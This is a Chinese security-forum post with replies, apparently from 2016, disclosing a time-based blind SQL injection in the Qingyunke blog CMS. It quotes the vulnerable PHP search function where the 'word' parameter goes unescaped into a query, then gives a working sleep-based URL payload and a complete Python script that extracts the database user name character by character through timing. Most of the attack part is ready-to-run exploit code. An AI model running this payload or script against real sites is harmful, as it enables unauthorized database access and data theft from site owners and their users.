青云客博客cms某处盲注

wuyan

延时注入，写代码受网速影响比较严重，网速不稳的话，可能误差比较大，当然，你可以适当把sleep数字搞大些，freebuf上面有一个转换成二进制，然后再开8个线程跑数据的思路，这里我就不写了。

在include/class_temp.php中

[PHP] 纯文本查看 复制代码

function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='title'){

	global $web,$tcz;

	if($mark=='special'){

		if(!$size)$size=$web['list_size'];

		$sql='select * from '.tabname('special_list').' where webid='.$web['id'].' and isdel=0 and special_id='.$tcz['id'].' order by dataid desc';

		$spelist=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);

		$list=array();

		$web['list_record']=$spelist['num'];

		$web['list_page']=$spelist['page'];

		foreach($spelist['list'] as $spe){

			$tname='article';

			if($spe['modtype']>10)$tname.='_'.$web['id'].'_'.$spe['modtype'];

			$art=db_getshow($tname,'*','webid='.$web['id'].' and isok=0 and dataid='.$spe['dataid']);

			array_push($list,$art);

			}

		return $list;

		}

	$order_text='xu desc,sort desc,time_add desc,dataid desc';

	if($order!='')$order_text=$order;

	$tname='article';

	$modtype=db_getone('module','modtype','webid='.$web['id'].goif($bcat,' and classid='.$bcat).goif($mark!='',' and mark="'.$mark.'"'));

	if($modtype>10)$tname.='_'.$web['id'].'_'.$modtype;

	$searsql='';

	$seartype='title';

	if($web['list_page']!='')$ispage=false;

	if($ispage){

		if($word=='')$word=$tcz['word'];

		if($word!=''){

			switch($tcz['seartype']){

				case 'date':

					$t1=strtotime($word.' 00:00:00');

					$t2=strtotime($word.' 23:59:59');

					if(empty($t1)){

						tipmsg('非法的搜索关键词：'.$word,true);

						}

					$searsql=' and time_add>='.$t1.' and time_add<='.$t2;

				break;

				default:

					if($tcz['seartype']!=''){

						if(strstr(','.$searfie.',',','.$tcz['seartype'].','))$seartype=$tcz['seartype'];

						}

					if(strstr($word,',')){

						$wlist=explode(',',$word);

						foreach($wlist as $w)$searsql.=goif($searsql!='',' or ').'LOCATE("'.$w.'",`'.$seartype.'`)>0';

						$searsql=' and ('.$searsql.')';

					}else $searsql=' and LOCATE("'.$word.'",`'.$seartype.'`)>0';

				break;

				}

			}

		if(!$size)$size=$web['list_size'];

		if(!$bcat&&$tcz['bcat']&&$mark==''&&$auto)$bcat=$tcz['bcat'];

		if($scat==''&&$tcz['scat']&&$auto)$scat=$tcz['scat'];

		if($lcat==''&&$tcz['lcat']&&$auto)$lcat=$tcz['lcat'];

		$sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($searsql!='',$searsql).' order by '.$order_text;

		$list=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);

		$web['list_record']=$list['num'];

		$web['list_page']=$list['page'];

		return $list['list'];

	}else{

		$sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($word!='',' and LOCATE("'.$word.'",`'.$seartype.'`)>0').' order by '.$order_text;

		$list=db_getlist($sql,$size);

		return $list;

		}

	}

其中变量$word过滤不得当，导致可以注入，测试了好多语句，最后别人给出的payload是延时注入，发现可以


漏洞验证：

[HTML] 纯文本查看 复制代码

http://127.0.0.1/?log=blog&seartype=title&word=%E9%9C%87%E6%92%BC%22%20and%20geometrycollection((select%20*from(select%20*%20from%20(select%20sleep%20(5))a)b))%20and%20%221%22=%221

效果页面延时5秒

写了个脚本：

[Python] 纯文本查看 复制代码

#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import time

session = requests.Session()
payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#$%^&*()-+=!@_.'
def httpGet(url):	
	global session
	try: 
		#print url
		timestart = time.time()
		session.get(url)
		times = time.time() - timestart
		#print times
	except Exception ,e:
		return 'timeout' 
	return times
def getLength(url):#获取长度
	i = 0
	temp = url
	while True:
		urls = temp
		urls = urls + '" and geometrycollection((select *from(select * from (select sleep (case when (select length(user())='+str(i)+') then 5 else 0.1 end))a)b)) and "1"="1'
		htmlContent = httpGet(urls)
		print 'i-->' + str(i)
		if htmlContent > 5:			
			print '长度为' + str(i)
			return i
			break
		i += 1
def getUser(url,length):
	data = ''
	temp = url
	for i in range(1,length):
		for payload in payloads:
			urls = temp + '" and geometrycollection((select *from(select * from (select sleep ( ascii(mid(user()from( '+str(i)+' )for(1)))='+str(ord(payload))+' ))a)b)) and "1"="1'
			#print urls
			htmlContent = httpGet(urls)
			print "猜解中......."
			if htmlContent > 3:
				print payload
				data += payload
				break
	return data



if __name__ == '__main__':
	length = getLength('http://127.0.0.1/?log=blog&seartype=title&word=qq')
	getUser('http://127.0.0.1/?log=blog&seartype=title&word=qq',length)

效果如下:

Fxfang

版本是v4.3.0?还是。。。？

wuyan

Fxfang 发表于 2016-4-14 16:13
版本是v4.3.0?还是。。。？

http://blog.qingyunke.com/

sladjfksld

这玩意儿能试试提交bugscan插件混邀请码

兮本洛丶

支持，看起来不错呢！

邪影复仇

啪啪啪。。。。90博客看到了